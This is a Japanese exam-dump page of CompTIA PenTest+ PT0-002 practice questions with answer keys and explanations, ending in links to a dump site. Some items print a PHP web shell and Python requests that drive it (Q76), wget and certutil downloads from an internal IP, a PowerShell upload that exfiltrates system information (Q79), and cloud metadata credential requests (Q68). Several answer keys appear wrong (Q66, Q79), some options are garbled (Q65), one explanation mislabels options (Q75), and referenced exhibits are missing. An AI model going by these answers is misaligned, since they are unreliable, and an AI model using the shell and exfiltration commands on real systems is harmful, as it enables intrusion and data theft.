PT0-002のPDF試験材料2024年最新の実際に出るPT0-002問題集
更新されたのはCompTIA PT0-002問題集PDFオンラインエンジン
CompTIA PenTest+認証の価値は、ベンダーニュートラル認証として認められているという点にあります。つまり、この認証は、特定の技術やベンダーに依存するのではなく、一般的なサイバーセキュリティの知識基盤に関連するものです。また、この認証は、侵入テストの手法を倫理的かつ責任ある方法で適用できることを証明し、プロフェッショナルとしての信頼性を高めます。雇用主は、この認証を持つ候補者を好みます。なぜなら、この認証を持っていると、候補者が組織のネットワークやデータをサイバー脅威から守る必要なサイバーセキュリティのスキルを持っていることが保証されるためです。
質問 # 62
A new security firm is onboarding its first client. The client only allowed testing over the weekend and needed the results Monday morning. However, the assessment team was not able to access the environment as expected until Monday. Which of the following should the security company have acquired BEFORE the start of the assessment?
- A. The correct user accounts and associated passwords
- B. The proper emergency contacts for the client
- C. The expected time frame of the assessment
- D. A signed statement of work
正解:B
質問 # 63
During an engagement, a penetration tester found the following list of strings inside a file:
Which of the following is the BEST technique to determine the known plaintext of the strings?
- A. Brute-force attack
- B. Dictionary attack
- C. Credential-stuffing attack
- D. Rainbow table attack
正解:D
質問 # 64
A penetration tester was brute forcing an internal web server and ran a command that produced the following output:
However, when the penetration tester tried to browse the URL http://172.16.100.10:3000/profile, a blank page was displayed.
Which of the following is the MOST likely reason for the lack of output?
- A. The tester did not run sudo before the command.
- B. The web server is using HTTPS instead of HTTP.
- C. The HTTP port is not open on the firewall.
- D. This URI returned a server error.
正解:C
質問 # 65
A penetration tester is conducting an unknown environment test and gathering additional information that can be used for later stages of an assessment. Which of the following would most likely produce useful information for additional testing?
- A. Searching for code repositories associated with a developer who previously worked for the target company
- B. Searching for code repositories associated with the target company's organization
- C. Searching for code repositories associated with a developer who previously worked for the target company code repositories associated with the
- D. Searching for code repositories target company's organization
正解:D
解説:
Code repositories are online platforms that store and manage source code and other files related to software development projects. Code repositories can contain useful information for additional testing, such as application names, versions, features, functions, vulnerabilities, dependencies, credentials, comments, or documentation. Searching for code repositories associated with the target company's organization would most likely produce useful information for additional testing, as it would reveal the software projects that the target company is working on or using, and potentially expose some weaknesses or flaws that can be exploited. Code repositories can be searched by using tools such as GitHub, GitLab, Bitbucket, or SourceForge1. The other options are not as likely to produce useful information for additional testing, as they are not directly related to the target company's software development activities. Searching for code repositories associated with a developer who previously worked for the target company may not yield any relevant or current information, as the developer may have deleted, moved, or updated their code repositories after leaving the company.
Searching for code repositories associated with the target company's competitors or customers may not yield any useful or accessible information, as they may have different or unrelated software projects, or they may have restricted or protected their code repositories from public view.
質問 # 66
Which of the following tools would be MOST useful in collecting vendor and other security-relevant information for IoT devices to support passive reconnaissance?
- A. Nmap
- B. WebScarab-NG
- C. Nessus
- D. Shodan
正解:A
質問 # 67
A penetration tester exploited a unique flaw on a recent penetration test of a bank. After the test was completed, the tester posted information about the exploit online along with the IP addresses of the exploited machines. Which of the following documents could hold the penetration tester accountable for this action?
- A. ROE
- B. NDA
- C. SLA
- D. MSA
正解:B
質問 # 68
After compromising a system, a penetration tester wants more information in order to decide what actions to take next. The tester runs the following commands:
Which of the following attacks is the penetration tester most likely trying to perform?
- A. Metadata service attack
- B. Resource exhaustion
- C. Credential harvesting
- D. Container escape techniques
正解:A
解説:
The penetration tester is most likely trying to perform a metadata service attack, which is an attack that exploits a vulnerability in the metadata service of a cloud provider. The metadata service is a service that provides information about the cloud instance, such as its IP address, hostname, credentials, user data, or role permissions. The metadata service can be accessed from within the cloud instance by using a special IP address, such as 169.254.169.254 for AWS, Azure, and GCP. The commands that the penetration tester runs are curl commands, which are used to transfer data from or to a server. The curl commands are requesting data from the metadata service IP address with different paths, such as /latest/meta-data/iam/security-credentials/ and /latest/user-data/. These paths can reveal sensitive information about the cloud instance, such as its IAM role credentials or user data scripts. The penetration tester may use this information to escalate privileges, access other resources, or perform other actions on the cloud environment. The other options are not likely attacks that the penetration tester is trying to perform.
質問 # 69
During a vulnerability scan a penetration tester enters the following Nmap command against all of the non-Windows clients:
nmap -sX -T4 -p 21-25, 67, 80, 139, 8080 192.168.11.191
The penetration tester reviews the packet capture in Wireshark and notices that the target responds with an RST packet flag set for all of the targeted ports. Which of the following does this information most likely indicate?
- A. Nmap needs more time to scan the ports in the target range.
- B. The ports in the target range cannot be scanned because they are common UDP ports.
- C. All of the ports in the target range are closed.
- D. All of the ports in the target range are open
正解:C
解説:
The Nmap command uses the Xmas scan technique, which sends packets with the FIN, PSH, and URG flags set. This is an attempt to bypass firewall rules and elicit a response from open ports. However, if the target responds with an RST packet, it means that the port is closed. Open ports will either ignore the Xmas scan packets or send back an ACK packet. Therefore, the information most likely indicates that all of the ports in the target range are closed. References: [Nmap Scan Types], [Nmap Port Scanning Techniques], [CompTIA PenTest+ Study Guide: Exam PT0-002, Chapter 4: Conducting Passive Reconnaissance, page 127]
質問 # 70
Which of the following is a ROE component that provides a penetration tester with guidance on who and how to contact the necessary individuals in the event of a disaster during an engagement?
- A. Engagementscope
- B. SOW
- C. SLA
- D. Communication escalation path
正解:D
解説:
The communication escalation path is a component of the Rules of Engagement (ROE) that provides a penetration tester with guidance on whom to contact and how to proceed in the event of an emergency or disaster during an engagement. This includes contact information for key individuals and predefined procedures to follow to ensure that any issues are addressed promptly and appropriately.
The engagement scope defines the boundaries and objectives of the test, the SLA (Service Level Agreement) outlines performance and uptime requirements, and the SOW (Statement of Work) details the tasks and deliverables. However, the communication escalation path specifically addresses communication protocols during emergencies.
References:
* Explanation of Rules of Engagement components: OWASP Testing Guide
* Examples from penetration testing engagements highlighting the importance of communication plans:
Anubis.
質問 # 71
During an internal penetration test against a company, a penetration tester was able to navigate to another part of the network and locate a folder containing customer information such as addresses, phone numbers, and credit card numbers. To be PCI compliant, which of the following should the company have implemented to BEST protect this data?
- A. Network segmentation
- B. Vulnerability scanning
- C. Intrusion detection
- D. System hardening
正解:A
解説:
Network segmentation is the practice of dividing a network into smaller subnetworks or segments based on different criteria, such as function, security level, or access control. Network segmentation can enhance the security of a network by isolating sensitive or critical systems from less secure or untrusted systems, reducing the attack surface, limiting the spread of malware or intrusions, and enforcing granular policies and rules for each segment. To be PCI compliant, which is a set of standards for protecting payment card data, the company should have implemented network segmentation to separate the servers that perform financial transactions from other parts of the network that may be less secure or more exposed to threats. The other options are not specific requirements for PCI compliance, although they may be good security practices in general.
質問 # 72
Which of the following tools would be BEST suited to perform a manual web application security assessment?
(Choose two.)
- A. Nessus
- B. Nmap
- C. Burp Suite
- D. OWASP ZAP
- E. BeEF
- F. Hydra
正解:C、D
質問 # 73
The following line-numbered Python code snippet is being used in reconnaissance:
Which of the following line numbers from the script MOST likely contributed to the script triggering a
"probable port scan" alert in the organization's IDS?
- A. Line 07
- B. Line 02
- C. Line 01
- D. Line 08
正解:D
質問 # 74
A client has requested that the penetration test scan include the following UDP services: SNMP, NetBIOS, and DNS. Which of the following Nmap commands will perform the scan?
- A. nmap -vv sUV -p 53, 122-123, 160-161 10.10.1.20/24 -oA udpscan
- B. nmap -vv sUV -p 53,123,161-162 10.10.1.20/24 -oA udpscan
- C. nmap -vv sUV -p 53,137-139,161-162 10.10.1.20/24 -oA udpscan
- D. nmap -vv sUV -p 53, 123-159 10.10.1.20/24 -oA udpscan
正解:C
質問 # 75
A penetration tester is conducting an Nmap scan and wants to scan for ports without establishing a connection.
The tester also wants to find version data information for services running on Projects. Which of the following Nmap commands should the tester use?
- A. ..nmap -sX -sC target.company.com
- B. ..nmap -sS -sV -F target.company.com
- C. ..nmap -sU -sV -T4 -F target.company.com
- D. ..nmap -sT -v -T5 target.company.com
正解:B
解説:
The Nmap command that the tester should use to scan for ports without establishing a connection and to find version data information for services running on open ports is nmap -sS -sV -F target.company.com. This command has the following options:
* -sS performs a TCP SYN scan, which is a scan technique that sends TCP packets with the SYN flag set to the target ports and analyzes the responses. A TCP SYN scan does not establish a full TCP connection, as it only completes the first step of the three-way handshake. A TCP SYN scan can stealthily scan for open ports without alerting the target system or application.
* -sV performs version detection, which is a feature that probes open ports to determine the service and version information of the applications running on them. Version detection can provide useful information for identifying vulnerabilities or exploits that affect specific versions of services or applications.
* -F performs a fast scan, which is a scan option that only scans the 100 most common ports according to the nmap-services file. A fast scan can speed up the scan process by avoiding scanning less likely or less interesting ports.
* target.company.com specifies the domain name of the target system or network to be scanned.
The other options are not valid Nmap commands that meet the requirements of the question. Option A performs a UDP scan (-sU), which is a scan technique that sends UDP packets to the target ports and analyzes the responses. A UDP scan can scan for open ports that use UDP protocol, such as DNS, SNMP, or DHCP.
However, a UDP scan does establish a connection with the target system or application, unlike a TCP SYN scan. Option C performs a TCP connect scan (-sT), which is a scan technique that sends TCP packets with the SYN flag set to the target ports and completes the three-way handshake with an ACK packet if a SYN/ACK packet is received. A TCP connect scan can scan for open ports that use TCP protocol, such as HTTP, FTP, or SSH. However, a TCP connect scan does establish a full TCP connection with the target system or application, unlike a TCP SYN scan. Option D performs an Xmas scan (-sX), which is a scan technique that sends TCP packets with the FIN, PSH, and URG flags set to the target ports and analyzes the responses. An Xmas scan can stealthily scan for open ports without alerting the target system or application, similar to a TCP SYN scan.
However, option D does not perform version detection (-sV), which is one of the requirements of the question.
質問 # 76
During an engagement, a penetration tester was able to upload to a server a PHP file with the following content:
<? php system ($_POST['cmd']) ?>
Which of the following commands should the penetration tester run to successfully achieve RCE?
- A. python3 -c "import requests;print (requests.post (url='http://172.16.200.10/uploads/shell.php', data={'cmd=id'}))"
- B. python3 -c "import requests;print (requests.post(url='http://172.16.200.10/uploads/shell.php', data= ('cmd':'id') ) .text) "
- C. python3 -c "import requests;print (requests.get (url='http://172.16.200.10/uploads/shell.php', params= ('cmd':'id'}) .text) "
- D. python3 -c "import requests;print (requests.get (url='http://172.16.200.10/uploads/shell.php', params=
{'cmd':'id'}) )"
正解:A
解説:
The PHP file uploaded by the penetration tester allows for Remote Code Execution (RCE) by executing the command supplied through the cmd POST parameter. To exploit this, the penetration tester needs to send a POST request to the PHP file with the command they want to execute.
Among the given options, Option A is the most suitable for achieving RCE:
* It uses Python's requests library to send a POST request, which is appropriate because the PHP script expects data through the POST method.
* The data parameter in the requests.post function is correctly formatted as a dictionary, which is the expected format for sending form data in POST requests. It includes the key cmd with the value id, which is a common command used to display the current user ID and group ID.
* The only minor issue with Option A is that it prints the entire response object, which includes not just the response content but also metadata like status code and headers. To print just the response content (which would include the output of the id command), appending .text to the requests.post call would be more precise, but this is a small detail and does not affect the execution of the command.
The other options have various issues:
* Option B is close but has a syntax error in the data argument. It uses parentheses () instead of curly braces {} for the dictionary, and also lacks the .text at the end to print the response content.
* Options C and D use the requests.get method, which is not suitable in this scenario because the PHP script is expecting data through the POST method, not the GET method. Additionally, Option D has a
* syntax error similar to Option B.
質問 # 77
A company hired a penetration-testing team to review the cyber-physical systems in a manufacturing plant. The team immediately discovered the supervisory systems and PLCs are both connected to the company intranet. Which of the following assumptions, if made by the penetration-testing team, is MOST likely to be
valid?
- A. Supervisory systems will detect a malicious injection of code/commands.
- B. Supervisors and controllers are on a separate virtual network by default.
- C. Controllers will not validate the origin of commands.
- D. PLCs will not act upon commands injected over the network.
正解:C
解説:
PLCs are programmable logic controllers that execute logic operations on input signals from sensors and output signals to actuators. They are often connected to supervisory systems that provide human-machine interfaces and data acquisition functions. If both systems are connected to the company intranet, they are exposed to potential attacks from internal or external adversaries. A valid assumption is that controllers will not validate the origin of commands, meaning that an attacker can send malicious commands to manipulate or sabotage the industrial process. The other assumptions are not valid because they contradict the facts or common practices.
質問 # 78
A penetration tester receives the following results from an Nmap scan:
Which of the following OSs is the target MOST likely running?
- A. Arch Linux
- B. Windows Server
- C. Ubuntu
- D. CentOS
正解:B
質問 # 79
A penetration tester has obtained a low-privilege shell on a Windows server with a default configuration and now wants to explore the ability to exploit misconfigured service permissions. Which of the following commands would help the tester START this process?
- A. schtasks /query /fo LIST /v | find /I "Next Run Time:"
- B. wget http://192.168.2.124/windows-binaries/accesschk64.exe -O accesschk64.exe
- C. certutil -urlcache -split -f http://192.168.2.124/windows-binaries/ accesschk64.exe
- D. powershell (New-Object System.Net.WebClient).UploadFile('http://192.168.2.124/ upload.php', 'systeminfo.txt')
正解:D
質問 # 80
A penetration tester gains access to a system and is able to migrate to a user process:
Given the output above, which of the following actions is the penetration tester performing? (Choose two.)
- A. Redirecting output from a file to a remote system
- B. Building a scheduled task for execution
- C. Creating a new process on all domain systems
- D. Adding an additional IP address on the compromised system
- E. Mapping a share to a remote system
- F. Setting up a reverse shell from a remote system
- G. Executing a file on the remote system
正解:E、G
解説:
WMIC.exe is a built-in Microsoft program that allows command-line access to the Windows Management Instrumentation. Using this tool, administrators can query the operating system for detailed information about installed hardware and Windows settings, run management tasks, and even execute other programs or commands.
質問 # 81
A penetration tester is conducting a penetration test and discovers a vulnerability on a web server that is owned by the client. Exploiting the vulnerability allows the tester to open a reverse shell. Enumerating the server for privilege escalation, the tester discovers the following:
Which of the following should the penetration tester do NEXT?
- A. Investigate the high numbered port connections.
- B. Note this finding for inclusion in the final report.
- C. Contact the client immediately.
- D. Close the reverse shell the tester is using.
正解:C
質問 # 82
During a penetration test, a tester is in close proximity to a corporate mobile device belonging to a network administrator that is broadcasting Bluetooth frames.
Which of the following is an example of a Bluesnarfing attack that the penetration tester can perform?
- A. Sniff and then crack the WPS PIN on an associated WiFi device.
- B. Dump the user address book on the device.
- C. Transmit text messages to the device.
- D. Break a connection between two Bluetooth devices.
正解:B
解説:
Explanation
Bluesnarfing is the unauthorized access of information from a wireless device through a Bluetooth connection, often between phones, desktops, laptops, and PDAs. This allows access to calendars, contact lists, emails and text messages, and on some phones, users can copy pictures and private videos.
質問 # 83
Which of the following tools would be best to use to conceal data in various kinds of image files?
- A. Metasploit
- B. Kismet
- C. Snow
- D. Responder
正解:C
解説:
Snow is a tool designed for steganography, which is the practice of concealing messages or information within other non-secret text or data. In this context, Snow is specifically used to hide data within whitespace of text files, which can include the whitespace areas of images saved in formats that support text descriptions or metadata, such as certain PNG or JPEG files. While the other tools listed (Kismet, Responder, Metasploit) are powerful in their respective areas (network sniffing, LLMNR/NBT-NS poisoning, and exploitation framework), they do not offer functionality related to data concealment in image files or steganography.
質問 # 84
A penetration tester has identified several newly released CVEs on a VoIP call manager. The scanning tool the tester used determined the possible presence of the CVEs based off the version number of the service. Which of the following methods would BEST support validation of the possible findings?
- A. Test with proof-of-concept code from an exploit database
- B. Utilize an nmap -sV scan against the service
- C. Review SIP traffic from an on-path position to look for indicators of compromise
- D. Manually check the version number of the VoIP service against the CVE release
正解:A
解説:
Testing with proof-of-concept code from an exploit database is the best method to support validation of the possible findings, as it will demonstrate whether the CVEs are actually exploitable on the target VoIP call manager. Proof-of-concept code is a piece of software or script that shows how an attacker can exploit a vulnerability in a system or application. An exploit database is a repository of publicly available exploits, such as Exploit Database or Metasploit.
Reference: https://dokumen.pub/hacking-exposed-unified-communications-amp-voip-security-secrets-amp- solutions-2nd-edition-9780071798778-0071798773-9780071798761-0071798765.html
質問 # 85
......
CompTIA PT0-002問題集PDFのベストを目指すなら問題集を使おう!高得点目指すならここ:https://www.jpntest.com/shiken/PT0-002-mondaishu
PT0-002のPDFで問題解答!PDFサンプル問題は信頼され続ける:https://drive.google.com/open?id=1Iw3qXwsDd60Hpa-CgIPTwJzjfTAC2vFm